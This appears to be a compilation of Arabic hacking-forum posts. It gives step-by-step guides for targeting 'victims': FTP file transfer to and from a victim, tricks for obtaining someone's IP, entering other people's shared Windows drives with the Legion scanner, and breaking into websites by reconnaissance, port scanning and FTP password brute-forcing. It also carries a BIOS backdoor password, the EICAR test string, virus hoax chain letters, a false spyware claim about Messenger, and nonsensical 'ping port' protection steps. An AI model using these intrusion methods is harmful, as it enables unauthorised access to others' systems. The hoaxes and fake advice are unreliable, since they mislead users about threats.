هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك


Pwd


لكي تعر ما يحتويه الهارد ديسك


Cd


لإقتحام مجلد مثال


Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك

Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك

Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe


Put
العملية الع**ية ل Get

يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe

Clos
لقطع الإتصال مع الضحية

رقام ايبيهات الدول

الكاتب : لا اعرف



Egypt 62.135.127.255 62.135.0.0
Bahrain 193.188.127.255 193.188.96.0
Oman 212.72.31.255 212.72.0.0
United Arab Emirates 217.165.255.255 217.164.0.0
United Arab Emirates 195.229.255.255 195.229.0.0
United Arab Emirates 194.170.255.255 194.170.0.0
United Arab Emirates 213.42.255.255 213.42.0.0
Jordan 212.118.31.255 212.118.0.0
Jordan 217.23.47.255 217.23.32.0
Jordan 194.165.159.255 194.165.128.0
Jordan 193.188.95.255 193.188.64.0
Saudi Arabia 62.3.63.255 62.3.0.0
Saudi Arabia 212.2.255.255 212.2.224.0
Saudi Arabia 213.238.31.255 213.238.0.0
Saudi Arabia 213.184.191.255 213.184.160.0
Saudi Arabia 212.93.223.255 212.93.192.0
Saudi Arabia 212.70.63.255 212.70.32.0
Saudi Arabia 217.8.79.255 217.8.64.0
Saudi Arabia 213.165.63.255 213.165.32.0
Saudi Arabia 212.102.31.255 212.102.0.0
Saudi Arabia 213.230.31.255 213.230.0.0
Saudi Arabia 212.33.191.255 212.33.160.0
Saudi Arabia 212.26.127.255 212.26.0.0
Lebanon 62.84.95.255 62.84.64.0
Kuwait 62.215.255.255 62.215.0.0
Kuwait 195.226.255.255 195.226.224.0
Kuwait 195.39.191.255 195.39.128.0
Kuwait 62.100.223.255 62.100.192.0
Kuwait 194.126.63.255 194.126.32.0
Kuwait 194.54.255.255 194.54.192.0
Kuwait 213.189.95.255 213.189.64.0
Kuwait 62.150.255.255 62.150.0.0
Malaysia 210.186.127.255 210.186.0.0
Iceland 217.9.143.255 217.9.128.0
Portugal 213.13.255.255 213.13.0.0
Pakistan 203.135.63.255 203.135.32.0
Denmark 62.135.255.255 62.135.128.0
Ukraine 217.9.15.255 217.9.0.0
Russian Federation 62.5.255.255 62.5.128.0
Russian Federation 212.118.63.255 212.118.32.0
Japan 61.21.255.255 61.21.0.0
India 61.1.255.255 61.0.0.0
Poland 213.17.255.255 213.17.128.0
Poland 217.9.175.255 217.9.160.0
Poland 217.9.191.255 217.9.176.0
Lithuania 217.9.255.255 217.9.240.0
Hungary 213.16.127.255 213.16.64.0
Turkey 213.14.255.255 213.14.0.0
Turkey 62.248.127.255 62.248.0.0
Turkey 195.175.255.255 195.174.0.0
Sweden 213.15.255.255 213.15.0.0
Sweden 62.5.127.255 62.5.0.0
France 213.11.255.255 213.11.0.0
France 80.15.255.255 80.8.0.0
France 213.16.31.255 213.16.0.0
France 213.19.127.255 213.19.0.0
Bulgaria 213.16.63.255 213.16.32.0
Switzerland 213.230.63.255 213.230.32.0
Switzerland 213.3.255.255 213.3.0.0
Great Britain 213.230.127.255 213.230.64.0
Great Britain 212.106.63.255 212.106.32.0
Great Britain 62.3.127.255 62.3.64.0
Great Britain 213.12.255.255 213.12.0.0
Great Britain 213.18.255.255 213.18.0.0
Great Britain 213.230.255.255 213.230.192.0
Great Britain 213.1.255.255 213.1.0.0
Great Britain 213.2.255.255 213.2.0.0
Italy 213.230.159.255 213.230.128.0
Italy 213.21.191.255 213.21.128.0
Italy 62.152.159.255 62.152.128.0
Norway 213.230.191.255 213.230.160.0
Netherlands 213.10.255.255 213.10.0.0
Netherlands 213.17.127.255 213.17.0.0
Netherlands 24.132.255.255 24.132.0.0
Netherlands 213.19.255.255 213.19.128.0
Greece 213.5.255.255 213.5.0.0
Greece 213.16.255.255 213.16.128.0
Germany 213.7.255.255 213.6.0.0
Germany 62.84.63.255 62.84.32.0
Germany 213.20.255.255 213.20.0.0
Germany 213.21.127.255 213.21.0.0
Germany 213.9.127.255 213.9.0.0
Israel 213.8.255.255 213.8.0.0
Israel 80.230.255.255 80.230.0.0
Israel 192.118.7.255 192.118.4.0
Israel 192.118.11.255 192.118.8.0
Israel 212.179.255.255 212.179.0.0
Israel 192.118.15.255 192.118.12.0
Israel 212.116.191.255 212.116.160.0
Israel 212.199.255.255 212.199.0.0
Israel 213.189.63.255 213.189.32.0
Israel 213.8.255.255 213.8.0.0
Philippines 203.215.95.255 203.215.64.0
Spain 213.9.255.255 213.9.128.0
Spain 62.151.255.255 62.151.0.0

للفائده يااخواني
ولا تسيئون الاستخدام




هنا طريقة معرفة الـ IP للضحية

======


الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر
-----------------------------------

في البداية أرسل للضحيه اي ملف او صورة او اي شيء

وبعد ما توصل بنجاح

تروح تفتح الدوس وطريقه فتحه كالآتي

تروح لــــ START ثم RUN وتكتب command أو Dosprmpt

بعد ماتفتح شاشه الدوس السوداء

تكتب هذا الأمر netstat -n

مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n

بعد كتابه الأمر يطلعك الشكل الأتي :-

Proto -- Local Address -- Foreign Addres -- State


Local Address هذا رقم الاي بي الخاص بيك انت
Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت
بس

الطريقة الثانيه من خلال الماسنجير
=======================
من خلال هذا الرابط
http://www.geocities.com/mondysite/mesn.zip

طريقة البرنامج

افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك

بعدين اظغط الزر اللي تحته

convert IP address

بعدين اظغط على الزر Listen

بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر

وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى

وبكذا تكون وفرت على نفسك ارسال اي ملفات

=================================================


الطريقة الثالثة
===========
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall -

ZONE ALARM - BLACK ICE

1-تجيب الIP الخاص بك ثم

2- تكتب الIP الخاص بك بالشكل هذا

http:// 212.34.34.78

3- طبعا الارقام الي فوق افتراضية

4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه

الضغط عليه

5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت

6- برنامج الف*** وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله

=================================================

الطريقة الرابعة عن طريق الإيميل
======================
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر
confirm.TO
يعني اذا فرضنا بريد الي تبي ترسل له

ali*************

يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل

ali*************.confirm.TO

وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به
وطبعا هو ما راح يعرف

==================================================







=========

الطريقة الخامسة عن طريق الإيميل ايضا
===========================

لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP حقه من رسالته في ((HOTMAIL))


من بريد الــHOTMAIL أختر options

بعدين اختر Mail Display Settings

بعدين massage headers

وغير الاختيار الى advanced

الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة

وبعض المعلومات الأخرى
==================================================







============

الطريقة السادسة عن طريق برنامج ICQ
==========================
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج

http://www.geocities.com/mondysite/ICQ_IP.zip

تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده

وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي حقه

هذه اسهل طريقة

==================================================







=============

الطريقة السابعة اظهار رقم ال IP للمواقع
==========================

تقوم تفتح شاشه الدوس وتكتب الأمر التالي


ping -wwww.xxxxxxxxx.com

ومكان xxxxxxx تحط اسم الموقع

هاذي الطريقه تطلع IP الموقع


من منكم و صل الى مرحلة الاخترق من دون باتش القليل فقط

رغم انها سهلة جداً طبعاً هذا درس صغير لتعليمك و هو جزء من اجزاء كثير نبداء

بسم الله الرحمن الرحيم

الأختراق بدون باتش و الحماية منه

هذه الطريقة تسمى طريقه المشاركة في الملفات والطابعة.

و لكن قبل بدء الاختراق يجب ان يتوافر شرط واحد لبدء الاختراق و هو

يجب أن يكون على نظامك عميل يسمى . Microsoft Networks

و طريقة اضافته كالتالى:

اضغط على زر ابدأ START

ومن ثم إعدادات . Settings

ومن ثم لوحة التحكم . Control Panel

ومن ثم بالنقر على أيقونة شبكات . Networks

سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client

ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة Microsoft

ومن ثم اختر العميل Client for Microsoft Networks

ومن ثم اضغظ موافق ، بعدها سيطلب منك ادخال قرص الويندوز

لتحميل بعض الملفات وبعدها يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل .

سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة .

ضع صح على كل من :

اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي.

I want to be able to give others access my files

اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي .

I want to be able to allow to others to print on my printers

· اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة .

· سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords )

· ستظهر معك شاشة كلمات السر ، قم انقر على ايقونه Remote Administration .

· ضع علامه صح على Enable remote administration of this server


وبعدها ادخل أي كلمة سرية مرتين ومن ثم موافق

. الغرض من هذه الخطوة كي لا يتمكن أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها

الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت .

==> الاختراق <==

اولا يجب عليك تحميل البرنامج المستخدم و هو Legion

(ملاحظة : البرنامج ليس لدى الان ولكن تستطيع البحث عنه في جوجول )

بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام الايبي

المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي السواقات والطابعات

المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك ادخال المدى

الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى 212.64.130.1

. بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث

سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في

القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل

عليه لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك في القائمة اليمنى .

فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي :

Shared resources at //212.64.130.55

Sharename Type Comment

ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــ

ATL OPS STUF Disk

C Disk

DC ROM Disk

DC STUFF DISK

FMPRO Disk

JW STUFF Disk

The command was completed successfully .


اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي .

بعدها اضغط على زر ابدأ . (START)

اختر تشغيل . (RUN)

ثم اكتب رقم الايبي

ــــــــــــــــــــــــــــــــــــــــــــــــــ
ـــــــــــ

عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer)

ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد .

==> كيف تحمي نفسك من الاختراق <==

اذا كنت مبتدء وتريد حمايه جهازك وملفاتك على الانترنت من هذه الطريقه فامسح العميل

Microsoft Network من اعدادات الشبكة ، وسوف يكون جهازك بامان تام ان شاء الله

امنع اى شخص من الدخول الى جهازك عبر الدوس


بسم الله الرحمن الرحيم

هتقفل جميع البورتات ال على الجهاز بتاعك

اولاا قم بفتح الدوس

اولاا ستار
تانى حاجه رن
تالت شى command

قم بالاتى

اول شى قم بكتابت الاتى

ping host

تانى شى

ping port80
تالت شى
ping port139
رابع شى
ping port23
خامس شى
ping host
ولحظ كدا مفيش اى شى يقدر
يخش من الدوس

الملفات المرفقة

BRNAMG AP.zip‏

الكثير منّا عند عمله على الحاسب يشعر بالتعب وخاصه في

الفتره الطويله ومن خلال تركيزه على الكلمات حتى النظر يتعب

وتصبح الكتابه مشوشه تقريبا وهذه الحركه ممكن تفيدنا وخاصه

لأصحاب النظر الضعيف بتكبير الكتابه للتكبير أضغط ctrl بصوره مستمره

وعن طريق سكرول الماوس نكبر ونصغر بالحجم المراد في أي صفحه

ممكن الكثير يعرف هذه الحركه ولكن أيضا يوجد بعض الأخوه لايعرفونها

وشكرا لسعة صدركم

السلام عليكم ورحمة الله وبركاته


قبل 48 ساعة قام مجموعه
من المبرمجين اليهود بإنتاج فايروس جديد
أخطر من فايروس
بلاستر
ويقوم الفايروس بتحميل نفسه
على جميع أنظمة الوندوز
وهو فايروس موجه للإيميلات
العربية والعرب على وجه الخصوص
وسيقوم الفايروس
بتدمير الهارد وير بدأ من تاريخ 20-2-2006
للتخلص من الفايروس:
أذهب إلى أبدا ثم بحث في الملفات والمجلدات ثم ضع اسم الفايروس
وهو
jdbgmgr.exe
وسيظهر لك الفايروس
على شكل دب لاتفتح الفايروس ولكن سويله حذف عادي كأنك تحذف ملف .
أبحث في جهازك الآن

لقد قمت بالتجربه وانصح الجميع بالبحث والتجربه

تقبلوا تحياتي

أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب .
بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
أنواع الكراكرز
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :
1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.
2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .
2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.

[FRAME="1 70"]أخطر فيروس أعلنت عنه (سي إن إن)
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..
والذي (يحرق) القرص الصلب ( C ) في أجهزة الكمبيوتر !


لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه Invitation
بغض النظر عمن أرسل لك الرسالة .
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب ( C ) في جهازك.
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك !
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !.
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها !

في حالة استلامك أي ميل تحت عنوان Invitation
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة !
بل أغلق جهازك على الفور !
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس . .
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات !
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب . .
حيث تحفظ كل المعلومات الأساسية.

____________________________________

This is the worst virus announced by CNN it has been classified by Microsoft as the most destructive virus ever "burns"
the whole hard disc C of your computer
You should be alert during the next days:
Do not open any message with an attached file called : " Invitation"
regardless of who sent it . It is a virus that opens an Olympic Torch which "burns" the whole hard disc C of your computer.
This virus will be received from someone who has your e-mail address in his/her contact ! list, that is why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it. If you receive a mail called "invitation", though sent by a friend, do not open it and shut down your computer immediately.
This is the worst virus announced by CNN, it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. [/FRAME]

كيف تحذف ملف تجسس الموجود فى كل ماسنجر
أنذار فى كل ماسنجر ملف تجسس
الماسنجير اصدار الرابع و الخامس والسادس فيهم ملف تجسس من شركة مايكروسوفت

اسم الملف هو Loadqm.exe

طرق حذف هذا الملف وهي كالاتي /

الخطوة الاولى

1) إبدأ

2) تشغيل

3) اكتب هذه الكلمه msconfig ستظهر لك شاشه تذذهب الى Startup

ثم تبحث على هذه الكلمه Loadqm.exe اذا وجدتها نلغي الصح عنها واضغط (تطبيق) وبعدين (موافق )بطلب منك هل تريد اعادة تشغيل الكمبيوتر تختار (موافق)

بعد ما عدنا تشغيل الكمبيوتر


************************************

الخطوة التانيه


تذهب مره اخرى على
إبدأ
تشغيل
وبعد ذلك تكتب Regedit

تظهر شاشه

تذهب HKEY_LOCAL_MACHINE

وبعد ذلك Software

وبعد ذلك Microsoft

وبعد ذلك Windows

وفي كلمة تشغيل تذهب للثانيه ستجد Loadqm.exe إحذفها


*****************************

الخطوة الثالثه

تذهب الى Start

ثم Programs

ثم MS-DOS Prompt

ونكتب deltree loadqm.exe



وهكذا انتهينا من ملف التجسس

واتمنى الشرح مبسط ولزيز ع قلوبكم

هنـا تجـد الحـل لفتحـ أي جهـاز مغـلق برقمـ سـري ...!
:
:
:
:
بعض الأجهزة عند تشغيلها تطلب كلمة سر قبل الدخول إلى شاشة ترحيب الويندوز وهذه الكلمة السرية تحفظ بالماذربورد واليك طريقة فتح لاجهزة المقفلة
توجد طريقتان لعمل ذلك :
الأولى : قم بإدخال ما بين القوسين { award-sw } بدلاً من الرقم الأصلي ،
ونسبة نجاحه 95% في عملية الفتح
الثانية : القيام بعملية إخراج البطارية الصغيرة التي توجد داخل صندوق الجهاز من مكانـها ثم إعادتـها
مرة أخرى ، والموجودة في اللوحة الرئيسية لجهاز الكمبيوتر ونسبة
نجاحها 100% والسبب هو لأن تلك العملية سوف تؤدي إلى الإلغاء النهائي
لعملية الإقـفال السري ، والبداية من جديد دون أية أضرار قد تحدث لجهازك....

[GRADE="8B0000 FF0000 FF7F50"]أخطر فيروس أعلنت عنه (سي إن إن)
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..
والذي (يحرق) القرص الصلب (C) في أجهزة الكمبيوتر !


لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه
Invitation
بغض النظر عمن أرسل لك الرسالة ..
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب (C) في جهازك.
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك !
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !.
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها !

في حالة استلامك أي ميل تحت عنوان Invitation
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة !
بل أغلق جهازك على الفور !
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس ..
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات !
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب ..
حيث تحفظ كل المعلومات الأساسية[/GRADE]

بسم الله الرحمن الرحيم

هذا اختبار لقوة برنامج حماية الفايروسات الموجود بجهازك

اضغط بزر الفارة اليمين على اي مكان فاضي بسطح المكتب واختار

جديد + مستند نص......ثم انسخ الاتي والصقه داخل المستند


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


ثم قم بحفظ المستند باي اسم ......مثل test

او احفظه كما هو باسم مستند نصي جديد

هذا ليس بفايروس وإنما اختبار لبرنامج الفايروسات الذي لديك فإن اكتشفه قبل أن

تحفظه فبرنامجك ممتاز وإن سمح لك بحفظه فبرنامجك ( أخرطي )

وهذي صورة من تجربتي
[IMG][/IMG]

والله الموفق

السلام عليكـــــــــم


اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى

www.victime.com

يكون من الصعب اختراقه بالنسبة لاى هكر لانه غالبا ما يستخدم DNS

Server

ونظم حماية كثيرة قد تصعب نسبة اختراقة 99%

لكن كن معى فى هذا الموضوع وسيكون كل شىء سهل بذن الله

يجب عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه

الخطوة

يجب ان نعرف نظم الحماية التى يستخدمها الموقع

ومن صاحب الموقع

وكل شىء اولا كى نستطيع دخول ساحة المناورة

لتقوم بذلك قم بالدخول الى هذا الموقع

http://www.whois.net

فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر

WHOIS Lookup

قم بكتابة اسم الموقع بجوارها على سبيل المثال

Victim.com

victim = الموقع الذى تريد احضار المعلومات عنه

ثم اضغط go

سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن

الحماية التى يستخدموها والشركة المستضيفة للموقع

قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت

من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى

سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس

الموقع لتحضر معلومات اكثر

ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها

واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع

التى تعطيك معلومات عن نظم الحماية

http://www.netcraft.com

وهكذا نكون قد انتهينا من اول خطوة

قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل

برنامج

site port scan , Gfi lan giard network securty scanner

او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة

وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى

السيرفر

غالبا ما ستجد البورت 80 و 21 و 808

لا يمكننا الهجوم من خلال البورت رقم 21 حيث انه سيكون مشفر بكلمة سر

لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من

خلاله

لدينا فى اكثر الحالات منفذان البورت 80 و 808

او 80 فقط اذا كان

اذا ظهر لك 80 فقط فما فى شىء بيتغير وتكون الخطوات تمام

قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال

برنامج

ws-ftp

او

cute

مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات

الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج

قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن

طريق الاف تى بى وغالبا ما يكون ftp.sitename.address

sitename = اسم الموقع

address = الامتداد .com او .net او غير ذلك

فى المرة هذه الخطوة قم بالدخول بصفة زائر

وذلك عن طريق وضع علامة صح امام كلمة anonymous

وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك

اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة

فان قسم الزوار يكون فارغ

اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع

واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار

قم بتحميل برنامج unsecure وهو افضل برامج اختراق المواقع

لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق

وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل

عن هذا الاسم

unsecure 1.2

وستجد مئات المواقع باذن الله

بعد ان تقوم بتحميل البرنامج

قم بكتابة عنوان الاف تى بى الخاص بالموقع

او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها

قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس

لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت

وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم

بتخمين كلى للباس وردات

بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى

من البورت 21 وليس 80

واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت

مثال اذا كان الموقع usa.com

يكون اسم الدخول usa

ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك

وهكذا تكون قد اخترقت الموقع ....

السلام عليكـــــــــــم



اخطر 4 ثغرات بويندوز اكس بى


الكثير منا تورقة مشكلة مايسمى بالهكر

ويعتمد الهكر على الثغرات الموجودة بجهازك بشكل رئيسى

لذا فعليك ان تتعرف على هذة الثغرات لكى تقوم بحماية جهازك ضد اى

متطفل او مخرب

ومن اخطر هذة الثغرات كما يلى :



الثغرة الأولى :

تعتبر إحدى البوابات الخطرة للفايروسات و ملفات التجسس

لوحة التحكم control panel

خيارات المجلد folder options

أنواع الملفات file types

وهناك ابحثو عن

ًWindows script host setting file

و احذفوه على الفور


الثغرة الثانية :

اسمها مشاركة ملفات بسيطة simple file sharing

لكن تفعيلها مش بسيط بل هو خطير جدا

خيارات المجلد folder options

عرض view

يجب إزالة علامة الصح من داخل المربع أمام

مشاركة ملفات بسيطة مستحسن

use simple file sharing

recommended



الثغرة الثالثة :

اسمها عدم حفظ الصفحات المشفرة إلى القرص

save encrypted page to disk

و الطريقة كالتالي

لوحة التحكم control panel

خيارات انترنت ineternet options

خيارات متقدمة advanced

وضع علامة صح داخل المربع

عدم حفظ الصفحات المشفرة إلى القرص

don't save encrypted page to disk

ثم موافق

و أحب أنوه إلى شي مهم و هو

عند الضغط على

إستعادة الإفتراضيات

restore default

بترجع علامات الصح مرة ثانية

وكذلك الحال مع ثغرة

مشاركة ملفات بسيطة

simple file sharing



الثغرة الرابعة :

اذهب الى my computer

